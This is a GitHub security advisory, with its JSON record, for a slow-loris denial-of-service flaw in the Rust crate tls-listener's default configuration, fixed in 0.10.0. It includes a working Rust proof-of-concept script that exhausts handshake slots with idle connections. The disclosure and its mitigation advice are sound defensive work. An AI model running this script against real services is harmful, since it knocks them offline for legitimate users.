ghsa-2qph-qpvm-2qf7
Vulnerability from github
Published
2024-03-15 19:57
Modified
2024-05-20 15:29
Severity
Summary
tls-listener affected by the slow loris vulnerability with default configuration
Details

Summary

With the default configuration of tls-listener, a malicious user can open 6.4 TcpStreams a second, sending 0 bytes, and can trigger a DoS.

Details

The default configuration options make any public service using TlsListener::new() vulnerable to a slow-loris DoS attack.

rust /// Default number of concurrent handshakes pub const DEFAULT_MAX_HANDSHAKES: usize = 64; /// Default timeout for the TLS handshake. pub const DEFAULT_HANDSHAKE_TIMEOUT: Duration = Duration::from_secs(10);

PoC

Running the HTTP TLS server example: https://github.com/tmccombs/tls-listener/blob/6c57dea2d9beb1577ae4d80f6eaf03aad4ef3857/examples/http.rs, then running the following script will prevent new connections to the server.

```rust use std::{net::ToSocketAddrs, time::Duration}; use tokio::{io::AsyncReadExt, net::TcpStream, task::JoinSet};

[tokio::main]

async fn main() { const N: usize = 1024; const T: Duration = Duration::from_secs(10);

let url = "127.0.0.1:3000";
let sockets: Vec<_> = url
    .to_socket_addrs()
    .unwrap()
    .inspect(|s| println!("{s:?}"))
    .collect();

let mut js = JoinSet::new();

let mut int = tokio::time::interval(T / (N as u32) / (sockets.len() as u32));
int.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Burst);
for _ in 0..10000 {
    for &socket in &sockets {
        int.tick().await;
        js.spawn(async move {
            let mut stream = TcpStream::connect(socket).await.unwrap();
            let _ = tokio::time::timeout(T, stream.read_to_end(&mut Vec::new())).await;
        });
    }
}

while js.join_next().await.is_some() {}

}

```

Impact

This is an instance of a slow-loris attack. This impacts any publically accessible service using the default configuration of tls-listener

Mitigation

Previous versions can mitigate this by passing a large value, such as usize::MAX as the parameter to Builder::max_handshakes.

Show details on source website


{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.9.1"
      },
      "package": {
        "ecosystem": "crates.io",
        "name": "tls-listener"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.10.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-28854"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-03-15T19:57:22Z",
    "nvd_published_at": "2024-03-15T19:15:07Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nWith the default configuration of tls-listener, a malicious user can open 6.4 `TcpStream`s a second, sending 0 bytes, and can trigger a DoS.\n\n### Details\nThe default configuration options make any public service using `TlsListener::new()` vulnerable to a slow-loris DoS attack.\n\n```rust\n/// Default number of concurrent handshakes\npub const DEFAULT_MAX_HANDSHAKES: usize = 64;\n/// Default timeout for the TLS handshake.\npub const DEFAULT_HANDSHAKE_TIMEOUT: Duration = Duration::from_secs(10);\n```\n\n### PoC\n\nRunning the HTTP TLS server example: https://github.com/tmccombs/tls-listener/blob/6c57dea2d9beb1577ae4d80f6eaf03aad4ef3857/examples/http.rs, then running the following script will prevent new connections to the server.\n\n```rust\nuse std::{net::ToSocketAddrs, time::Duration};\nuse tokio::{io::AsyncReadExt, net::TcpStream, task::JoinSet};\n\n#[tokio::main]\nasync fn main() {\n    const N: usize = 1024;\n    const T: Duration = Duration::from_secs(10);\n\n    let url = \"127.0.0.1:3000\";\n    let sockets: Vec\u003c_\u003e = url\n        .to_socket_addrs()\n        .unwrap()\n        .inspect(|s| println!(\"{s:?}\"))\n        .collect();\n\n    let mut js = JoinSet::new();\n\n    let mut int = tokio::time::interval(T / (N as u32) / (sockets.len() as u32));\n    int.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Burst);\n    for _ in 0..10000 {\n        for \u0026socket in \u0026sockets {\n            int.tick().await;\n            js.spawn(async move {\n                let mut stream = TcpStream::connect(socket).await.unwrap();\n                let _ = tokio::time::timeout(T, stream.read_to_end(\u0026mut Vec::new())).await;\n            });\n        }\n    }\n\n    while js.join_next().await.is_some() {}\n}\n\n```\n\n### Impact\n\nThis is an instance of a [slow-loris attack](https://en.wikipedia.org/wiki/Slowloris_(computer_security)). This impacts any publically accessible service using the default configuration of `tls-listener`\n\n\n### Mitigation\n\nPrevious versions can mitigate this by passing a large value, such as `usize::MAX` as the parameter to `Builder::max_handshakes`.",
  "id": "GHSA-2qph-qpvm-2qf7",
  "modified": "2024-05-20T15:29:52Z",
  "published": "2024-03-15T19:57:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/tmccombs/tls-listener/security/advisories/GHSA-2qph-qpvm-2qf7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28854"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tmccombs/tls-listener/commit/d5a7655d6ea9e53ab57c3013092c5576da964bc4"
    },
    {
      "type": "WEB",
      "url": "https://en.wikipedia.org/wiki/Slowloris_(computer_security)"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/tmccombs/tls-listener"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tmccombs/tls-listener/releases/tag/v0.10.0"
    },
    {
      "type": "WEB",
      "url": "https://rustsec.org/advisories/RUSTSEC-2024-0341.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "tls-listener affected by the slow loris vulnerability with default configuration"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading...

Loading...